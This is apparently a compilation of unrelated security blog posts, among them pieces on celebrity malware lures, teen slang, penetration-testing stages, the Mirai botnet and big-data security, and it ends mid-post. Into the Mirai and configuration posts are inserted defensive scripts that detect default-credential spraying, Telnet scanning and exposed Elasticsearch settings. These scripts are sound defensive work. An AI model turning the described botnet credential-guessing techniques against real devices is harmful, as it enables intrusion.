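SAMPLE_BROKEN='12:00:05.000200 IP 192.168.40.1 > 192.168.40.50: ICMP echo reply, id 1234, seq 1, length 64
12:00:05.000210 IP 192.168.40.1 > 192.168.40.50: ICMP echo reply, id 1234, seq 1, length 64
12:00:06.000250 IP 192.168.40.1 > 192.168.40.50: ICMP echo reply, id 1234, seq 2, length 64'

# Run the parser on the constructed samples; no network access is needed.
run_samples() {
    printf 'healthy capture: %s\n' "$(printf '%s\n' "$SAMPLE_OK" | check_capture)"
    printf 'broken capture:  %s\n' "$(printf '%s\n' "$SAMPLE_BROKEN" | check_capture)"
}

run_samples
```

For a live sensor, run `sudo sh -c '. ./check_bidir.sh; check_interface enp0s8 192.168.40.1'` (the file name is an assumption) while pinging the remote address from a second host; anything other than `ok` means the sensor, not the switch span, needs attention before trusting its ja3 or any other client-side Zeek fields.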

Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity

The net is dark and full of terrors, especially for fans of HBO’s popular show Game of Thrones®. As followers of the series gear up for the premiere of the eighth and final season on April 14th, fans may have more than just White Walkers to worry about. According to McAfee’s study on the Most Dangerous Celebrities, it turns out that search results for Emilia Clarke are among those most likely to be infected with malware.

In fact, the actress who portrays Daenerys Targaryen in the TV drama came in at #17 of our 2018 Most Dangerous Celebrities study. Cybercriminals use the allure of celebrities – such as Clarke – to trick unsuspecting users into visiting malicious websites. These sites can be used to install malware on a victim’s device or steal their personal information or passwords. With the premiere of the new season right around the corner, it’s likely that cybercrooks will take advantage of the hype around the show to lure supporters into their trap.

Thankfully, there are plenty of ways fans can keep up with the show and characters without putting their online safety at risk. Follow these tips to pledge your allegiance to your cybersafety:

  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites is the equivalent of spreading the Mad King’s wildfire to your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.
  • Be careful what you click. Don’t bend the knee to hackers who tempt users to click on their malicious sites. Users looking for information on the new season should be careful and trust only reliable sources. The safest option is to wait for the official release instead of visiting a potentially malware-ridden third-party website.
  • Keep your device software updated. Install new system and application updates on your devices as soon as they’re available. These updates often include security fixes that can help protect your laptop or computer from an army of undead software bugs.
  • Protect your online realm with a cybersecurity solution. Send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

We wish you good fortune in the browsing to come. To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others. Copyright ©2019 McAfee, LLC

The post Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity appeared first on McAfee Blogs.

12 ways IT can create business value in 2019

With technology today’s fuel for business transformation, IT leaders are increasingly seen as key players in companies’ quests to bolster their bottom lines. But with so many new technologies and management approaches emerging, where should IT leaders put their focus?

We asked a range of tech leads what they’re planning this year and how those initiatives can best be approached to add value to their organizations, based on business priorities. Some involve embracing emerging technologies for improved workflows and products; others involve new approaches to how work gets done.   

Here’s what tech leaders think should be top of mind for creating value in 2019.

To read this article in full, please click here

Teen Texting Slang (and Emojis) Parents Should Know

What adults call texting, kids call talking. They “talk” on their phones via chat, social comments, snaps, posts, tweets, and direct messages. And they are talking most of the time — tap, tap, tap — much like background music. In all this “talking” a language, or code, emerges just as it has for every generation only today that language is in acronyms, hashtags, and emojis. And while the slang is perfectly understood peer-to-peer, it has parents googling like crazy to decipher it.

And this language changes all the time. It expands and contracts, and specific acronyms and symbols (emojis) can change in meaning entirely over time, which is why we update this list periodically.

This time we’ve added emojis (scroll to bottom) since those powerful little graphic symbols have singlehandedly transformed human communication, as we know it.

Harmless Banter

We publish this list with an important reminder: Teen texting slang isn’t inherently bad or created with an intent to deceive or harm. Most of the terms and symbols have emerged as a kind of clever shorthand for fast moving fingers and have no dangerous or risky meaning attached. So, if you are monitoring your kids’ phones or come across references you don’t understand, assume the best in them (then, of course, do your homework).

For example, there are dozens of harmless words such as finna (fixing to do something), yeet (a way to express excitement), skeet (let’s go), Gucci (great, awesome, or overpriced), AMIRITE (am I right?) QQ4U (quick question for you), SMH (shaking my head), bread (money), IDRK (I don’t really know), OOTD (outfit of the day), LYAAF (love you as a friend), MCE (my crush everyday), HMU (hit me up, call me), W/E (whatever), AFK (away from keyboard), RTWT (read the whole thread), CWYL (chat with you later), Ship (relationship), CYT (see you tomorrow) or SO (significant other).

The Red Flags 

Here are some terms and emojis that may not be so innocent. Any of these terms can also appear as hashtags if you put a # symbol in front of them.

Potential bullying slang

Ghost = to ignore someone on purpose

Boujee = rich or acting rich

Sip tea = mind your own business

The tea is so hot = juicy gossip

AYFKM? = are you f***ing kidding me?

Thirsty = adjective describing a desperate-acting, needy person

Basic = annoying person, interested in shallow things

Extra = over the top, excessive, dramatic person

TBH = to be honest (sometimes followed by negative comments)

Zerg = to gang up on someone (a gaming term that has morphed into a bullying term)

KYS = kill yourself

SWYP = so what’s your problem?

182 = I hate you

Curve = to reject someone

Shade = throwing shade, to put someone down.

POS = piece of sh**

WTF = what the f***

Derp = stupid

Lsr = loser

Butters = ugly

Jelly = jealous

Subtweet = talking about someone but not using their @name

Bizzle = another word for b***h

THOT or thotties = a promiscuous girl/s

YAG = you are gay

Cyber pretty = saying someone only looks good online with filters

Beyouch = another word for b***h

RAB = rude a** b***h

IMHO = in my honest opinion

IMNSHO = in my not so honest opinion

NISM = need I say more?

Potential risky behavior slang  

Broken = hung over

Pasted = high or drunk

Belfie = self-portrait (selfie) featuring the buttocks

OC = open crib, party at my house

PIR = parents in the room

9, CD9, Code 9 = parents here

99 = parents gone

Smash = to have casual sex

Slide into my DM = connecting through a direct message on a social network with sexual intentions

A3: Anytime, anywhere, anyplace

WTTP = want to trade pictures?

S2R = send to receive (pictures)

sugarpic = refers to a suggestive or erotic photograph

TDTM = talk dirty to me

KMS = kill myself

AITR = adults in the room

KPC = keeping parents clueless

1174 = invite to a wild party usually followed by an address

53X = sex

Chirped = got caught

Cu46 = see you for sex

LMIRL = let’s meet in real life

GNRN = get naked right now

Pron = porn

Frape = Facebook rape; posting to someone else’s profile when they leave it logged in.

NSFW = not safe for work (post will include nudity, etc)

Livingdangerously = taking selfies while driving or some other unsafe behavior

Kik = let’s talk on kik instant message instead

Sue = suicide

Dep = depression

Svv = self- harming behavior

SN = send nudes

Nend sudes = another way to say SN/send nudes

PNP = party and play (drugs + sex)


Potential drug-related slang

420, bud, tree = marijuana

Blow, mayo, white lady, rock, snow, yay, yale, yeyo, yank, yahoo = Cocaine

Special K = ketamine, liquid tranquilizer

Pearls = a nicely rolled blunt

Dabbing = concentrated doses of marijuana (began as a dance craze)

DOC = drug of choice

Turnt up / turnt = high or drunk

Geeked up = being high

Bar = Xanax pill

Bar out = to take a Xanax pill

Baseball = crack cocaine

Skrill = Money

Bread = money

CID = acid

E, XTC  = ecstasy

Hazel = heroin

Blue Boogers = snorting Adderall or Ritalin

Pharming = getting into medicine cabinets to find drugs to get high

Oxy, perks, vikes = opioids

Robo-tripping = consuming cough syrup to get high

Tweaking = high on amphetamines

Wings = cocaine; heroin

Speed, crank, uppers, Crystal or Tina = meth


Red flag emojis

Frog = an ugly person

Frog + tea (coffee) cup = that’s the tea (gossip)

Any kind of green plant/leaves = marijuana

Maple leaf = marijuana

Broccoli = marijuana

Smoke puff or gasoline = get high

Snowflake = cocaine

Person skiing = cocaine

Pill = ecstasy or MDMA for sale

Face with steam from nose = MDMA drug

Rocket = high potency drug for sale

Syringe = heroin

Diamond = crystal meth, crack cocaine for sale

Skull = die

Knife + screaming face = calling someone a psycho

Bowling ball + person running = I’m gonna hit you, coming for you

Flowers = drugs

Dollar sign = it’s for sale

Syringe = heroin (also tattoo)

Cat with heart eyes = sex

Purple face with horns = sex

Gas pump = sex

Tongue, eggplant, water drops, banana, peach, taco, cherries, drooling face, rocket = sex

Rose, rosette, cherry, pink cherry blossom, growing heart, airplane, crown = emojis that refer to sex trafficking

When it comes to figuring out what your kids are up to online, using your own instincts and paying attention will be your best resources. If something doesn’t sound or look right on your child’s phone trust that feeling and look deeper. You don’t have to know every term or symbol — the more important thing is to stay aware and stay involved.

The post Teen Texting Slang (and Emojis) Parents Should Know appeared first on McAfee Blogs.

A Deeper Look at Gartner’s Hype Cycle for Application Security

The application security market is ever-changing, with new technologies emerging on a continuous basis. One helpful way to stay on top of the AppSec market is Gartner’s most recent Hype Cycle for Application Security, 2018.

When it comes to DevSecOps, Gartner notes that “adoption is slow, but interest is high,” and showcases development’s shift towards DevOps environments in the name of speed and agility. DevOps is great for an organization, but not if the security piece is siloed and acts in a way that disrupts the speed of development. This is why, Gartner points out, “Security must be a part of this shift, but in a way that respects the collaborative nature of DevOps.”

Veracode’s own Tim Jarrett, Director of Product Management, recently attended DevSecOps Days as part of this year’s RSA Conference, and took away some valuable points on trends in DevSecOps. The general overview was that the theory of DevOps is fantastic, but the practice itself isn’t as straightforward, which is why it makes sense that DevSecOps is catching on in theory, but remains aspirational in practice. This might seem like a bump in the road of progression, but DevSecOps can be successful if security teams are able to communicate the definitive business value.

Read more about Tim’s DevSecOps Days takeaways here.

Software composition analysis

According to Gartner, “Software Composition Analysis is expected to reach the ‘Plateau of Productivity’ in two to five years.” This is supported by the fact that SCA has become more of a mainstream technology that vendors offer as a part of their solution suites. The surge of SCA offerings from software security vendors essentially began when attention was called to the widespread impact of software vulnerabilities like Heartbleed and Apache Struts.

The need for a solution that could analyze open source components was only furthered by the widespread use of open source code and the rampant amount of vulnerabilities that came along with such components. Veracode’s own State of Software Security Report Vol. 9 reported that in last year alone, 87.5% of Java applications contained a component with at least one vulnerability.

In addition to recommending that organizations use SCA tools on a regular basis to ensure software security, Gartner also stated that “SCA tools fit well within DevSecOps-style workflows, where scanning can be automated as part of the rapid development processes.”

Get the State of Software Security Volume 9 Software Composition Analysis Infosheet here.

Application security testing suites

Application security testing suites are a consolidation of AST technologies, including – but not limited to – static analysis, dynamic analysis, software composition analysis, and secure code training to more effectively verify the security of a company’s codebase.

To cover all of your bases when it comes to application security, one option is to use multiple vendors so that you have access to the “best-of-breed” technologies in each category. However, Gartner points out the downside to this approach; “the requirement to deal with different systems, separate dashboards,” and a not-really-unified approach. “Rather than engaging multiple vendors, Gartner clients have increasingly been seeking ‘one-stop-shop’ vendors that offer multiple technologies in a single platform with flexible deployment options.”

Veracode is one of those “one-stop-shops,” and can provide visibility into application status across all testing types, including SAST, DAST, SCA, and manual penetration testing in one centralized view. To learn more about Veracode’s comprehensive AppSec platform, check out this Platform Overview eBook, or, schedule a demo to see how we can help your specific organization.


Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Gartner, Hype Cycle for Application Security, 2018, 27 July 2018, Ayal Tirosh

Weekly Update 133

Wow, a weekly update back on the normal schedule! I also realised when watching this back how less tired I look compared to the last few weeks. Travel takes its toll so I touched on that a bit in this week's update, along with the usual raft of new data breaches to go into HIBP. Plus there's Facebook's incidents, both the one they're not directly responsible for and the one they are responsible for, but is also both a bit of a non-event and something that's reflective of broader issues in the industry.

Next week should be bang on schedule again and with any luck, I'll look even less tired again 😎

References

  1. Here's everything that goes into a massive international speaking trip (people always publicly share the good stuff in their lives, this is the warts and all version)
  2. Stop hosting forum software yourself! (that was specifically targeted at vBulletin, I later also wrote about my broader approach to platform outages when I'm not responsible for them)
  3. The Intelimost breach has a really interesting write-up by Zack Whittaker (and it's kinda fun to see sleazy spammers come undone!)
  4. It's not Facebook's fault that 3rd party developers exposed a bunch of data from their APIs (but there's still a discussion to be had about how much data Facebook should be exposing in the first place)
  5. It is Facebook's fault that they were asking for people's email account passwords (although in practical terms, it also doesn't particularly matter)
  6. Twilio is this week's blog sponsor (they're talking about how 2FA helps secure online transactions and helps comply with regs like PSD2)

Six Stages of Penetration Testing

Through penetration testing, you can proactively identify the most exploitable security weaknesses before someone else does. However, there’s a lot more to it than the actual act of infiltration. Pen testing is a thorough, well thought out project that consists of several phases. Read on to learn about what it takes to complete a successful pen test.

Planning and Preparation

Many old adages proclaim the import of preparation, and when it comes to penetration testing, planning is indeed the key to success. There are multiple ways to approach a pen test and figuring out your goals and scoping accordingly is key to ensuring that you’re going to get the most out of the process. Consider these questions to ensure your expectations are aligned with the testers and you get the information you’re looking for.

  • Do you want an external test, which simulates an attack from an outside individual or organization, or an internal test, which simulates an attack from an insider, or an attacker that has a foothold within the organization?
  • Would you prefer your security team to know a pen test is about to be performed, or would you rather it be performed covertly to identify their effectiveness in detecting the activity?
  • How much information do you want to share with the pen testers beforehand?
  • How aggressive are the pen testers allowed to be?


Discovery

Once the scope has been established, pen testing teams can get to work. In this discovery phase, teams perform different types of reconnaissance on their target. On the technical side, information like IP addresses can help determine information about firewalls and other connections. On the personal side, data as simple as names, job titles, and email addresses can hold great value. Attackers can use this data to send phishing emails or figure out who may have privileged credentials, with which they can get full access to the environment.

Additionally, before exploiting a system, pen testing teams must look for weaknesses within the environment. Often referred to as footprinting, this phase of discovery involves gathering as much information about the target systems, networks, and their owners as possible without attempting to penetrate them. An automated scan is one technique that can be used to search for vulnerabilities that can be used as a doorway.

Penetration Attempt and Exploitation

Now informed about their target, pen testers can begin using these newly discovered entry points, testing all of the weaknesses they discovered. They will attempt to enter the target through these identified entry points.

But pen testers will do far more than just attempt to gain access. Once inside a compromised system, they will try to elevate their access privileges within the environment, allowing them to take any number of additional actions. Gaining administrative privileges enables pen testers to identify security weaknesses in other areas and resources, like poor configuration, unguarded access to sensitive data, or ineffective management of accounts and passwords.

Additionally, multiple types of assets can be tested. In addition to the on-premise network infrastructure and workstations you’d expect could be vulnerable to attack, mobile devices, web applications, and even IoT devices like security cameras, can also be put to the test.

Analysis and Reporting

Pen testers should carefully track everything they do during the discovery and exploitation process. From there, they can create a report that includes all of these details, highlighting what was used to successfully penetrate the system, what security weaknesses were found, and any other pertinent information discovered.

These reports should also include analysis to help map out next steps once the test has concluded. Pen testing teams can help determine the highest priority items that an organization should take care of as soon as possible, as well as suggestions for remediation methods.

Clean Up and Remediation

Just as with a real attack, pen testers can leave “footprints.” It’s critical to go back through systems and remove any artifacts used during the test, since they could be leveraged in the future by someone with nefarious intentions. Once this is completed, an organization can go about the business of fixing the security weaknesses discovered and prioritized during the testing phase. This may include putting compensating controls in place to protect weaknesses that cannot be easily remediated, or even investing in new solutions that can streamline security and improve efficiency.

Retest

Penetration tests can and should be utilized frequently, especially when new applications or infrastructure are being deployed. Even if your organization believes they resolved every weakness listed in a previous report, the best way to ensure your remediations are effective is to test again. Additionally, IT environments, and the methods used to attack them, are constantly evolving, so it is to be expected that new weaknesses will emerge.

With so many breaches dominating the news, it’s more critical than ever to reduce the chance that an incident could put your organization’s reputation and trustworthiness at stake. Organizations should do everything they can to understand and avoid behaviors that put them at risk. Pen testing is an essential part of a risk assessment strategy and helps ensure that your organization is reducing the chance of a damaging breach occurring within your environment.

Read our guide to learn how you can get smarter about penetration testing.


Teaching Old Malware New Tricks: How the Latest Mirai Variant Targets New Devices

Though initially created to give players of the game Minecraft an advantage, the Mirai malware strain has since been responsible for a number of notable distributed denial of service (DDoS) attacks, including the one suffered by DNS provider Dyn, which resulted in outages for numerous Internet platforms. Before its creators were caught and prosecuted, they posted the source code online, allowing Mirai to take on a life of its own. Mirai has now reemerged, enhanced and ready to cause more damage. Read on to learn how Mirai works, what its newest features are, and how you can protect your organization from this destructive malware strain.


What is a Botnet?

Mirai operates by breaching Linux devices and creating botnets. This type of malware operates by having its original home device, known as a bot herder or bot master, infect and remotely control any kind of device – from a smart phone to a security camera. Using this command-and-control technique (C&C or C2), it can instruct the breached device to run a bot, which is a software application that runs automated scripts to perform tasks over the Internet. Once the bot herder has taken control of multiple devices, often numbering into the hundreds or thousands, it uses this cluster of bots, known as a botnet, to run more sophisticated, malicious tasks.

Most commonly, botnets are used in DDoS attacks, like the Dyn incident mentioned above. With so many bots under their control, an attacker can have all of them send requests to a targeted system, flooding it with traffic, blocking out any legitimate requests. Eventually, this influx of traffic will overwhelm a system, causing it to crash.

Brand New Enterprise Exploits

Mirai resurfaced a few times since its initial foray onto the scene. Since the code is now freely available, changes can be made at the whim of any malicious actor. For example, in early 2018, one successor used its botnet to steal cryptocurrency from computers dedicated to cryptocurrency mining.

Now Mirai has rematerialized once more, with this variant updated to target eleven additional devices. A few of the newly targeted devices, like the WePresent Wireless Presentations and LG Supersign TVs, are intended for use by enterprise organizations. This pivot into business class devices should put businesses on their guard, since it gives attackers a window into organizational networks for additional exploitation. Additionally, it shows a pivot towards loftier end goals, since devices connected to these enterprise networks give threat actors even more bandwidth to use in their botnet attacks.


Same Old Mirai Infrastructure

Mirai isn’t a particularly complex piece of malware – which is dangerous in its own right, as it gives far more people opportunities to use it. Ultimately, its success lies in its exploitation of the weak security that plagues most IoT devices.

Mirai’s bot master directs its controlled devices to continuously scan the Internet in search of IP addresses for IoT devices. From there, it uses a list of default usernames and passwords to attain administrative access of the device. Given Mirai’s numerous successful attacks, there are a worrisomely large number of devices that still have these credentials in place.

This strategy would be far less frequently successful on traditional workstations and servers within an organization. First, they are far more likely to have policies in place requiring frequent password changes, multi-factor authentication, or even identity and access management solutions to ensure that administrative access isn’t so easily acquired.

Moreover, most antivirus solutions for workstations or servers would be able to spot these simplistic breach attempts and stop them in their tracks. Unfortunately, nearly all IoT devices still lack antivirus solutions, making them a prime target for techniques that are no longer as common on workstations or network servers.

Finally, IoT devices are ideal because most of them are constantly connected to the internet and are owned or operated by users who are unaware of the security risks that these devices can pose.
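The credential-guessing behaviour described above leaves a recognisable trace in a device's own login log: a burst of failed logins for several different default usernames from one source, sometimes followed by a success. The script below is an added example from a defender's side, not code from the original post or from any vendor named on the page; it reads such log lines and lists sources that exceed a failure threshold, marking those where a login was later accepted. The log format, hostname, usernames and IP addresses are constructed, and real devices log in many different formats, so the field parsing is the part to adapt.

```sh
#!/bin/sh
# Added example, not from the original post: surface Mirai-style default
# credential guessing in IoT device login logs. Log format, hostnames,
# usernames and IP addresses below are constructed for illustration.

# Constructed log lines in the form:
#   <mon> <day> <time> <host> <service>: <FAILED|ACCEPTED> user=<u> from=<ip>
SAMPLE_LOG='Apr 05 10:00:01 cam-01 telnetd: FAILED user=root from=203.0.113.7
Apr 05 10:00:02 cam-01 telnetd: FAILED user=admin from=203.0.113.7
Apr 05 10:00:02 cam-01 telnetd: FAILED user=support from=203.0.113.7
Apr 05 10:00:03 cam-01 telnetd: FAILED user=user from=203.0.113.7
Apr 05 10:00:04 cam-01 telnetd: FAILED user=guest from=203.0.113.7
Apr 05 10:00:05 cam-01 telnetd: ACCEPTED user=admin from=203.0.113.7
Apr 05 10:01:10 cam-01 sshd: FAILED user=ops from=192.168.40.20
Apr 05 10:01:15 cam-01 sshd: ACCEPTED user=ops from=192.168.40.20'

# spray_sources THRESHOLD: reads log lines on stdin and prints, per source
# with at least THRESHOLD failed logins, one line:
#   <ip> <failures> <distinct usernames tried> <accepted|no-accept>
# "accepted" means a login succeeded after the burst, i.e. a default
# credential worked and the device should be treated as compromised.
spray_sources() {
    awk -v thr="$1" '
        {
            ip = ""; user = ""; res = $6
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^from=/) ip = substr($i, 6)
                if ($i ~ /^user=/) user = substr($i, 6)
            }
            if (ip == "") next
            if (res == "FAILED") {
                fail[ip]++
                if (!((ip, user) in users)) { users[ip, user] = 1; nusers[ip]++ }
            }
            # only count a success as suspicious once the source has already
            # crossed the failure threshold
            if (res == "ACCEPTED" && fail[ip] >= thr) acc[ip] = 1
        }
        END {
            for (ip in fail)
                if (fail[ip] >= thr)
                    print ip, fail[ip], nusers[ip] + 0, (ip in acc ? "accepted" : "no-accept")
        }'
}

# scan_log FILE THRESHOLD: same report for a real log file, sorted by address.
scan_log() {
    spray_sources "$2" < "$1" | sort
}

# Demo on the constructed sample with a threshold of 3 failures.
printf '%s\n' "$SAMPLE_LOG" | spray_sources 3
```

Sources that appear with `accepted` are the ones to isolate first; the `no-accept` rows are still worth blocking at the perimeter, since the same bot will keep cycling through its list. Pair this with the mitigation the text implies: change the vendor default credentials before the device is reachable from the Internet at all.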


Fighting Command and Control with Advanced Threat Detection

In addition to having ideal targets in IoT devices, botnets like Mirai are also particularly difficult to detect and remove because aside from causing a system to become sluggish at times, they don’t really do anything to make their presence known.

With this latest iteration of Mirai, along with a number of other botnets currently being deployed, threatening enterprise IoT devices, how can an organization be sure that their devices aren’t currently under the control of a bot master? Advanced threat detection solutions like Core Network Insight constantly monitor network traffic for threat behavior and activities, detecting anomalous behavior in real time and with certainty by providing definitive evidence of infections, regardless of device type. This allows security teams to take immediate action to clear bots from the system.

While this variant is new, Mirai’s C&C communication structure remains the same. Core Network Insight detects based on this type of communication, so no matter the variant, Network Insight will still be able to accurately uncover it. Network Insight is also agentless, as well as OS and platform agnostic, so no matter how many different device types are targeted, botnets like Mirai cannot evade detection.
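As an added illustration of what detecting a bot by its behaviour rather than by its binary can look like, here is a small example of my own (it is not Core Network Insight's code, nor anything from the Mirai source). It flags internal hosts whose outbound flows look like the scanning described above: many distinct destinations on ports 23 and 2323, the Telnet ports Mirai's scanner is known to target, inside a short window. The flow records, addresses, window length and threshold are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple

# Ports Mirai's scanner brute-forces with its default-credential list.
SCAN_PORTS = {23, 2323}


class Flow(NamedTuple):
    ts: datetime
    src: str
    dst: str
    dport: int


# Constructed NetFlow-style records: "timestamp src dst dport".
# 10.0.5.17 behaves like an infected camera; the others are ordinary hosts.
SAMPLE_FLOWS = """\
2019-04-02T10:00:00 10.0.5.17 203.0.113.4 23
2019-04-02T10:00:00 10.0.5.17 203.0.113.9 23
2019-04-02T10:00:01 10.0.5.17 198.51.100.2 23
2019-04-02T10:00:01 10.0.5.17 198.51.100.7 2323
2019-04-02T10:00:02 10.0.5.17 192.0.2.11 23
2019-04-02T10:00:02 10.0.5.17 192.0.2.12 23
2019-04-02T10:00:03 10.0.5.17 192.0.2.13 23
2019-04-02T10:00:03 10.0.5.17 192.0.2.14 23
2019-04-02T10:00:04 10.0.5.17 192.0.2.15 23
2019-04-02T10:00:04 10.0.5.17 192.0.2.16 23
2019-04-02T10:00:05 10.0.5.17 192.0.2.17 23
2019-04-02T10:00:05 10.0.5.17 192.0.2.18 2323
2019-04-02T10:00:01 10.0.1.8 203.0.113.50 443
2019-04-02T10:00:02 10.0.1.8 203.0.113.51 443
2019-04-02T10:00:03 10.0.1.8 10.0.9.3 23
2019-04-02T10:00:03 10.0.5.20 192.0.2.40 2323
2019-04-02T10:00:09 10.0.5.20 192.0.2.41 2323
"""


def parse_flows(text: str) -> List[Flow]:
    """Turn the whitespace-separated sample records into Flow tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows.append(Flow(datetime.fromisoformat(ts), src, dst, int(dport)))
    return flows


def scan_fanout(flows: List[Flow], window: timedelta = timedelta(seconds=60)) -> Dict[str, int]:
    """For each source, the largest number of distinct destinations it contacted
    on SCAN_PORTS within any sliding window of the given length."""
    by_src: Dict[str, List[Flow]] = defaultdict(list)
    for f in flows:
        if f.dport in SCAN_PORTS:
            by_src[f.src].append(f)
    fanout: Dict[str, int] = {}
    for src, fl in by_src.items():
        fl.sort(key=lambda f: f.ts)
        best, start = 0, 0
        for end in range(len(fl)):
            # Slide the window start forward until it spans at most `window`.
            while fl[end].ts - fl[start].ts > window:
                start += 1
            best = max(best, len({f.dst for f in fl[start:end + 1]}))
        fanout[src] = best
    return fanout


def find_scanners(flows: List[Flow], threshold: int = 10,
                  window: timedelta = timedelta(seconds=60)) -> List[str]:
    """Sources whose Telnet fan-out reaches the threshold; a single internal
    host legitimately opening Telnet to one switch never gets near it."""
    return sorted(src for src, n in scan_fanout(flows, window).items() if n >= threshold)


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    print(scan_fanout(flows))          # per-host fan-out on ports 23/2323
    print(find_scanners(flows))        # the camera only
```

The threshold is deliberately about fan-out (distinct destinations) rather than packet volume, because a scanning bot touches many unrelated addresses briefly, which is the pattern an ordinary device never produces on these ports.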

To get more information on the only mature, purpose-built active threat detection solution on the market, or a personalized demonstration from one of our experts, contact us today.


3 Factors to Consider When Securing Big Data

Big data is the new toy in town—a technological commodity that is driving development, but is also a major point of contention between companies, users, and governing entities. But despite the name big data, it is often in the possession of small businesses that have not taken the appropriate measures to secure it. When such large amounts of information are on the line, a breach of this data can be extremely detrimental.

With continual scandals being aired concerning poor privacy protections, it is even more important for your data to be protected. Consider these three things when securing big data: your specific configurations, what access you give out, and how to monitor your data.

1. Configurations

It was June of last year that the Exactis leak was revealed. Exactis, a Floridian marketing data broker, had a misconfigured Amazon ElasticSearch server that exposed close to 340 million records on both American adults and businesses. This included incredibly specific details such as pets, gender of children, and smoking habits. This leak has crippled Exactis; there is little chance that Exactis will bounce back from this event. Beyond the effect that this leak has had on the business, Exactis CEO Steve Hardigree has also been open about the stream of inquiries, threats, and constant stress it has brought into his personal life.

The root of this crippling leak lies in a misconfiguration, and it shows just how configurations can make or break your business. When you are planning out your big data space, you need to double- and triple-check your configurations.

Tips for Checking your Configurations:

  • Security is a multi-layered beast and your data is unique, which in turn means that your approach to security must be customized. This could mean using security software in an unconventional manner or utilizing a third-party security company.
  • Think of the little things. Do you trust all of the programming interacting with your data? If not, how can you make it a trusted resource?
  • Consider getting a third-party Network Security & Architecture Review of your environment. This allows you to have an outside opinion of exactly how secure your data is. If possible, it is beneficial to get this review at least annually.
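As an added example of what "checking your configurations" can mean concretely (this is my own code, not Exactis's configuration or any vendor's tool), here is a small audit of the settings that turn a search cluster into a public one. It reads the flat `key: value` form of an Elasticsearch `elasticsearch.yml` and applies three rules. The setting names are Elasticsearch's documented ones (`network.host`, `xpack.security.enabled`, `xpack.security.http.ssl.enabled`); treating an absent security key as "off" is an assumption that matches the 6.x/7.x-era defaults; both sample configurations are constructed.

```python
from typing import Dict, List, Tuple

# Values of network.host that keep the HTTP API on the loopback interface only.
LOOPBACK = {"127.0.0.1", "::1", "localhost", "_local_"}

# Constructed "before" configuration: reachable from every interface,
# no authentication, no TLS. This is the shape of the Exactis-style exposure.
WEAK_CONFIG = """\
cluster.name: marketing-data
network.host: 0.0.0.0          # listen on all interfaces
http.port: 9200
# xpack.security.* left at its (off) default
"""

# Constructed "after" configuration: private interface, auth and TLS on.
# A host firewall restricting port 9200 to the application tier is still needed.
HARDENED_CONFIG = """\
cluster.name: marketing-data
network.host: 10.0.3.5         # private interface only
http.port: 9200
xpack.security.enabled: true
xpack.security.http.ssl.enabled: true
xpack.security.transport.ssl.enabled: true
"""


def parse_flat_yaml(text: str) -> Dict[str, str]:
    """Parse the flat `dotted.key: value` lines Elasticsearch accepts.
    Comments and blank lines are skipped; nested YAML blocks are not handled."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        settings[key.strip()] = value.strip().strip("'\"")
    return settings


def is_enabled(settings: Dict[str, str], key: str) -> bool:
    # Assumption: a missing key means "false", the pre-8.0 default for X-Pack security.
    return settings.get(key, "false").lower() == "true"


def audit(text: str) -> List[Tuple[str, str, str]]:
    """Return (severity, setting, explanation) findings for one config file."""
    s = parse_flat_yaml(text)
    findings: List[Tuple[str, str, str]] = []
    host = s.get("network.host", "_local_")
    exposed = host not in LOOPBACK
    auth = is_enabled(s, "xpack.security.enabled")
    tls = is_enabled(s, "xpack.security.http.ssl.enabled")
    port = s.get("http.port", "9200")
    if exposed and not auth:
        findings.append(("critical", "network.host",
                         f"bound to {host} with authentication off: anyone who can reach "
                         f"port {port} can read, change or delete every index"))
    if not auth:
        findings.append(("high", "xpack.security.enabled",
                         "authentication and role-based access are disabled"))
    if exposed and not tls:
        findings.append(("medium", "xpack.security.http.ssl.enabled",
                         "the HTTP API is plaintext, so credentials and data cross the network unencrypted"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name)
        for sev, key, why in audit(cfg):
            print(f"  [{sev}] {key}: {why}")
```

Run against a real file, the rule set is the part you extend: every data store has its own two or three settings whose combination means "listening to the world without a lock", and an automated check of those belongs in the same pipeline that deploys the configuration.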

2. Access Granted

As you are deciding on configurations, you need to take into account who will be granted access and to what.

If the data is meant to stay completely internal, you need to decide what kinds of users are allowed what permissions. For example, who is allowed to pull data? Is anyone? If it is not part of the daily workload, under what circumstances is it allowed? By whom?

If you are going to share your data with third parties, there is another host of questions to consider. Do you allow them unlimited access to your data? Who do you allow access to?

Tips for Granting Internal & External Access:

  • Limit the amount of external access you allow; if possible, do not allow it at all. This will lessen your attack surface and your inherent risk.
  • External resources likely don’t need to access everything your internal resources can. Restrictive groups are a great organizational way to separate who has access to what within your environment.
  • Not all internal resources are equal and therefore should not be given the same access. You will need to evaluate how you give out access and document your process for escalating and de-escalating it.

As has become evident with Facebook’s admission that it left data connections open even after deals had been closed, it is also important to think about what happens when access has been revoked. What are you going to put in place to prevent access when it should no longer be allowed?

Take the access you grant seriously so you don’t end up scrambling to make changes after an incident.

3. Monitoring & Alerting

